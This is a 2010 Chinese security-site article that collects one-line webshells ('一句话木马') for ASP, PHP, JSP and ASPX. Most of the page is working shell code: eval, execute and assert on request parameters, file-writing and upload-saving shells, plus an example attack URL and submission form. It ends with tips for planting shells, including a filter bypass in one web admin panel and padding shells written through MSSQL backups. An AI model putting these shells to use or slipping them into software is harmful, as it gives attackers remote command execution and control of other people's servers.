首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>网络安全>文章内容
一句话木马
来源:vfocus.net 作者:vfocus 发布时间:2010-07-28  
asp一句话木马

程序代码 程序代码
<%eval request("sb")%>

程序代码 程序代码
<%execute request("sb")%>

程序代码 程序代码
<%execute(request("sb"))%>

程序代码 程序代码
<%execute request("sb")%><%'<% loop <%:%>

程序代码 程序代码
<%'<% loop <%:%><%execute request("sb")%>

程序代码 程序代码
<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

程序代码 程序代码
%><%Eval(Request(chr(35)))%><%

程序代码 程序代码
<%eval request("sb")%>

程序代码 程序代码
<%ExecuteGlobal request("sb")%>

程序代码 程序代码
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
//容错代码
程序代码 程序代码
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
%>


//使用冰狐一句话客户端链接

程序代码 程序代码
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
%>


调用示例:
程序代码 程序代码
http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29



php一句话

程序代码 程序代码
<?php eval($_POST[sb])?>

程序代码 程序代码
<?php @eval($_POST[sb])?>
           //容错代码
程序代码 程序代码
<?php assert($_POST[sb]);?>
        //使用lanker一句话客户端的专家模式执行相关的php语句
程序代码 程序代码
<?$_POST['sa']($_POST['sb']);?>

程序代码 程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>

程序代码 程序代码
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
      //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码 程序代码
<O>h=@eval($_POST[c]);</O>


程序代码 程序代码
<script language="php">@eval($_POST[sb])</script>
//绕过<?限制的一句话



JSP一句话

程序代码 程序代码
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>


提交客户端

程序代码 程序代码
<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
<input type=submit value="提交">
</form>



ASPX一句话
程序代码 程序代码
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>


程序代码 程序代码

<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句话

程序代码 程序代码
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])  ); }%>
//C#的asp.net一句话

程序代码 程序代码
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
VB的asp.net一句话

第一:114la网址导航系统后台getwebshell,最新版本,已经禁止了直接输入<?php这样的代码
所以可以试用<script language="php">...<script>来绕过

第二,使用菜刀的附加数据功能可以出现很多转换.所以还是仔细阅读下菜刀的readme.txt,上面的代码来自LCX的博客

第三,使用mssql备份一句话的时候,特别是asp.net和jsp,因为代码过长,所以,需要再代码前面和后面多加空格等垃圾字符保证代码完整性,这个跟备份bat到启动项一个原理.

 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·samcrypt.lib简介
·教你轻松查看QQ空间加密后的好友
·web sniffer 在线嗅探/online ht
·SPIKE与Peach Fuzzer相关知识
·asp,php,aspx一句话集合
·Cisco PIX525 配置备忘
·用Iptables+Fedora做ADSL 路由器
·检查 Web 应用安全的几款开源免
·Md5(base64)加密与解密实战
·NT下动态切换进程分析笔记
·风险评估中的渗透测试
·QQ2009正式版SP4文本信息和文件
  相关文章
·自动化操控虚拟战争
·网络渗透测试指导手册
·SPIKE与Peach Fuzzer相关知识
·麻烦的终结者
·从真实故事说起 读黑客战术社会
·记录一次网站被黑抓马记
·IDS规避与对策
·Web开发框架安全杂谈
·系统监控:蜜罐分析技术
·QQ2009正式版SP4文本信息和文件
·一台肉鸡能创造多少价值?为您讲
·关于流量,木马,插件,网马赚钱
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved